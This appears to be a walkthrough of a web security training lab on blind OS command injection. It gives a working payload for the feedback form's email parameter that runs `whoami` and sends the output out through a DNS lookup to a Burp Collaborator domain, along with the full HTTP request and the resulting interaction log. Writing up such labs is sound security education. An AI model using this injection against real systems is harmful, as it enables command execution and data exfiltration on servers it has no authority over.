Blind OS command injection with out-of-band data exfiltration

Description

This lab contains a blind OS command injection vulnerability in the feedback function. The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. But it is possible to trigger out-of-band interactions with an external domain.

Reproduction and proof of concept

  1. Use Burp Suite Professional to intercept and modify the request that submits feedback.

  2. Go to the Collaborator tab.

  3. Click “Copy to clipboard” to copy a unique Burp Collaborator payload to your clipboard.

  4. Modify the email parameter, changing it to something like the following:

email=||nslookup+`whoami`.hk5vl3zdi4zucr2tr0c14z3qchi860up.oastify.com||

The request now looks like:

POST /feedback/submit HTTP/1.1
Host: 0a7000c003c37b04c3374d4e009000bb.web-security-academy.net
Cookie: session=qliyIHtpjkwmWtNs0pW8fs7ji2qvW5hA
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: https://0a7000c003c37b04c3374d4e009000bb.web-security-academy.net
Referer: https://0a7000c003c37b04c3374d4e009000bb.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

csrf=8hSNG1tBfEmAaa2HbN5ZobYzrgHHpdsO&name=Test&email=||nslookup+`whoami`.hk5vl3zdi4zucr2tr0c14z3qchi860up.oastify.com||&subject=out-of-band+data+exfiltration&message=is+possible

  1. Go back to the Collaborator tab, and click Poll now. You should see some DNS interactions that were initiated by the application as the result of your payload. If you don’t see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.

  2. Observe that the output from your command appears in the subdomain of the interaction, and you can view this within the Collaborator tab. The full domain name that was looked up is shown in the Description tab for the interaction.

The Collaborator server received a DNS lookup of type A for the domain name peter-Xy4jpt.hk5vl3zdi4zucr2tr0c14z3qchi860up.oastify.com.  The lookup was received from IP address 3.251.104.180:18037 at 2023-Feb-04 14:37:12.044 UTC.

  1. To complete the lab, enter the name of the current user, in this case peter-Xy4jpt.

Exploitability

An attacker will need to execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator, and then enter the name of the current user to complete the lab. Note: To prevent the Academy platform being used to attack third parties, the firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, use Burp Collaborator’s default public server (or a C2).